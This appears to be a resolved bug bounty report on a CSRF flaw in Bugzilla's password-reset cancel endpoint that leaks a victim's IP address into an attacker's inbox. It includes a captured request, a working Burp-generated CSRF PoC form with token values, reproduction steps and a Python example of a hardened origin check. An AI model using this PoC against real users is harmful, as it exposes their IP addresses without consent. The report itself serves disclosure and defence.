#2 CSRF to Information disclosure on password cancel endpoint
Low
Vulnerability Details
## Summary:
Hi team,
A few months ago I found #2106662 ```CSRF to information disclosure vulnerability``` and the team resolved it. While testing again I found the same vulnerability on https://bugzilla.mozilla.org/. When someone requests a password reset token and then cancels the password reset, they receive an email notification, and that email contains the victim's IP address. So an attacker can easily obtain the victim's IP address through the cancellation process.
It's a low-hanging security risk, but it's significant for users, since the attacker is able to get the victim's IP address.
This discloses users' information. One click and the information is disclosed.
Suppose the attacker creates an account on https://bugzilla.mozilla.org/, and the attacker knows the victim also has an account on https://bugzilla.mozilla.org/. The attacker creates a CSRF payload using his own email, because the attacker knows how the password reset functionality works (the notification contains the IP address). Now the attacker sends the malicious link to the victim.
Request:
```http
POST /token.cgi HTTP/2
Host: bugzilla.mozilla.org
Cookie: _ga=GA1.2.943165794.1724831061; _ga_PWTK27XVWP=GS1.1.1724884053.2.0.1724884053.0.0.0; _ga_MQ7767QQQW=GS1.1.1726224133.2.0.1726224133.0.0.0; _ga_B9CY1C9VBC=GS1.1.1727174575.2.1.1727174593.0.0.0; _gid=GA1.2.1127107875.1727130511
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Origin: http://burpsuite
Referer: http://burpsuite/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel
```
Converted to a CSRF PoC:
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://bugzilla.mozilla.org/token.cgi" method="POST">
<input type="hidden" name="cancel_token" value="1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI" />
<input type="hidden" name="t" value="3XOIDGIRtcwC3icniucOlm" />
<input type="hidden" name="a" value="cxlpw" />
<input type="hidden" name="cancel" value="Cancel" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
## Steps To Reproduce:
1. Create an account on https://bugzilla.mozilla.org/ and send a password reset link to the attacker's own email.
2. The attacker opens the password cancel link and builds the CSRF HTML page from it.
3. Send it to the victim; the attacker receives the email "Password change request canceled".
4. When the attacker opens the email, the attacker gets the victim's IP address.
Note that in this PoC payload the attacker uses his own email, because when the victim clicks the malicious link, the attacker receives the victim's information in the attacker's own inbox.
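The captured request above already shows why this works: the victim's browser needs no Bugzilla session at all (the only cookies sent are analytics cookies), the `cancel_token` is one the attacker obtained himself, and the server acts on the POST even though the browser labels it `Sec-Fetch-Site: cross-site` with an `Origin` of `http://burpsuite`. The following is an added example, not Bugzilla's code and not the fix Mozilla applied (the report does not say how it was resolved). It models the accepting behaviour described in the report beside a hardened request-provenance check that uses the Fetch Metadata and `Origin`/`Referer` headers visible in the capture; the sample requests are constructed from those headers, and `EXPECTED_ORIGIN` is an assumption for the demonstration.

```python
"""Request-provenance check for a state-changing form endpoint.

Added example (not Bugzilla code).  Compares the report's accepting behaviour
with a check that rejects cross-site submissions using Fetch Metadata, falling
back to Origin and then Referer for browsers that do not send Sec-Fetch-*.
"""
from urllib.parse import parse_qsl, urlsplit

# Assumption for the demo: the only origin allowed to submit the cancel form.
EXPECTED_ORIGIN = "https://bugzilla.mozilla.org"

# Constructed sample: the relevant headers of the cross-site request from the
# report, with the token values copied from the capture.
CROSS_SITE_REQUEST = """\
POST /token.cgi HTTP/2
Host: bugzilla.mozilla.org
Content-Type: application/x-www-form-urlencoded
Origin: http://burpsuite
Referer: http://burpsuite/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1

cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel
"""

# Constructed sample: the same form submitted from Bugzilla's own cancel page.
SAME_ORIGIN_REQUEST = """\
POST /token.cgi HTTP/2
Host: bugzilla.mozilla.org
Content-Type: application/x-www-form-urlencoded
Origin: https://bugzilla.mozilla.org
Referer: https://bugzilla.mozilla.org/token.cgi?t=3XOIDGIRtcwC3icniucOlm&a=cxlpw
Sec-Fetch-Site: same-origin

cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel
"""

# Constructed sample: an old browser with no Fetch Metadata and no Origin,
# only a cross-origin Referer.
LEGACY_CROSS_SITE_REQUEST = """\
POST /token.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Content-Type: application/x-www-form-urlencoded
Referer: http://burpsuite/

cancel_token=1727251240-UxKc4U5ThgrHPhWNJ323-fahjy5Pn05h5ZYb7OqG-SI&t=3XOIDGIRtcwC3icniucOlm&a=cxlpw&cancel=Cancel
"""


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased headers, form dict)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = dict(parse_qsl(body.strip()))
    return lines[0], headers, form


def _origin_of(url):
    """scheme://host[:port] of a URL, lower-cased, or None if it has no authority."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def vulnerable_cancel_allowed(headers, form):
    """Behaviour the report describes: a well-formed cancel POST is processed
    regardless of where the browser says it came from."""
    return "cancel_token" in form and form.get("cancel") == "Cancel"


def hardened_cancel_allowed(headers, form):
    """Same form validation, plus a request-provenance check."""
    if not vulnerable_cancel_allowed(headers, form):
        return False
    # 1. Fetch Metadata is authoritative when present.  "same-site" (another
    #    subdomain) is deliberately rejected here; relax only if subdomains are trusted.
    site = headers.get("sec-fetch-site")
    if site is not None:
        return site in ("same-origin", "none")
    # 2. Older browsers: fall back to Origin, then Referer.
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value:
            return _origin_of(value) == EXPECTED_ORIGIN
    # 3. No provenance at all: fail closed for a state-changing request.
    return False


def decide(raw):
    """Return (accepted_by_vulnerable_handler, accepted_by_hardened_handler)."""
    _, headers, form = parse_request(raw)
    return vulnerable_cancel_allowed(headers, form), hardened_cancel_allowed(headers, form)


if __name__ == "__main__":
    for label, req in (("cross-site", CROSS_SITE_REQUEST),
                       ("same-origin", SAME_ORIGIN_REQUEST),
                       ("legacy cross-site", LEGACY_CROSS_SITE_REQUEST)):
        vuln, hard = decide(req)
        print(f"{label:18s} vulnerable={vuln} hardened={hard}")
```

The point of the fallback order is that a session-bound anti-CSRF token would not help here on its own: the request in the report carries no session cookie, so the victim's browser is merely a relay for its IP address and the server has nothing to bind a per-session token to. Checking where the submission came from (or not echoing the requester's IP address into the notification in the first place) addresses what the report actually demonstrates.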
## Impact
An attacker can obtain the victim's information by sending a link to the victim; the resulting notification email will contain the victim's IP address.
Report Stats
- Report ID: 2737309
- State: Closed
- Substate: resolved
- Upvotes: 25